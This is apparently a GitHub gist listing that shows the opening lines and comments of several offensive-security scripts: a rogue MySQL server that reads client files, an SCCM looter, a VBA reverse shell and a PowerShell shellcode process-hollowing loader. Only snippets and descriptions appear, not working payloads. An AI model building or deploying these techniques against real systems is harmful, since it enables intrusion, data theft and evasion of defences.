This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Modernized version of https://github.com/Gifts/Rogue-MySql-Server that works without further dependencies. | |
# However, this technique does no longer work by default in most MySQL clients. The ability of the server | |
# to request local files from the client is usually restricted nowadays and needs to be unlocked using specific | |
# parameters in the client config or the connection string. The following lines show a an example how to emulate | |
# a vulnerable PHP based MySQL client: | |
# | |
# php > $db = new PDO('mysql:host=127.0.0.1;dbname=test', 'root', 'root', array(PDO::MYSQL_ATTR_LOCAL_INFILE => true)); | |
# php > $db->query('SELECT user()'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# This script contains a python version of sccm-http-looter (https://github.com/badsectorlabs/sccm-http-looter) | |
# The following additional packages may need to be installed depending on the usage: | |
# | |
# pip install requests-ntlm (required for authenticated access to SCCM DPs) | |
# pip install requests[socks] (required for usage over socks proxy) | |
# | |
# The script attempts to obtain a package list via HTTP directory listing. However, when dealing | |
# with large package lists, this is not 100% reliable as the server may cut the amount of entries |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <tchar.h> | |
#include <psapi.h> | |
#include <winnt.h> | |
#include <winternl.h> | |
typedef NTSTATUS(*MyNtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG); | |
int main(int argc, char** argv) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#flag -lws2_32 | |
#include "winsock2.h" | |
struct WSADATA { | |
mut: | |
w_version u16 | |
w_high_version u16 | |
i_max_sockets u16 | |
i_max_udp_dg u16 | |
lp_vendor_info &string = 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
function usage() | |
{ | |
NAME=$(basename $0) | |
echo "Usage: $NAME [filter] [path]" | |
echo "" | |
echo "Arguments:" | |
echo " filter regex filter that is applied to archive contents" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if ! command -v ugrep &> /dev/null; | |
then | |
echo "[-] Error: ugrep is not available, but required for this script." | |
exit 1 | |
fi | |
function usage() | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import re | |
import sys | |
import argparse | |
class Xor: | |
''' | |
Helper class for performing xor operations. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import string | |
import argparse | |
import itertools | |
from typing import Iterator | |
def swaperoo(target: str) -> Iterator[str]: | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' ******************************************************************************************************** | |
' | |
' VBA reverse shell that uses Win32 API calls. Most of the code was copied from the following resources: | |
' | |
' * https://stackoverflow.com/questions/8670391 | |
' * https://stackoverflow.com/questions/43197814 | |
' * https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/examples/ | |
' | |
' The code demonstrates more complex usage example for calling Win32 API from VBA and should be used | |
' for educational purpose only. During development I was mainly interested whether the WSAData or the |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using | |
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle, | |
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle | |
and GetProcAddress to obtain the addresses of the other required Win32 API calls. | |
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state | |
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed | |
and the shellcode is executed enveloped within the trusted svchost.exe process. |
NewerOlder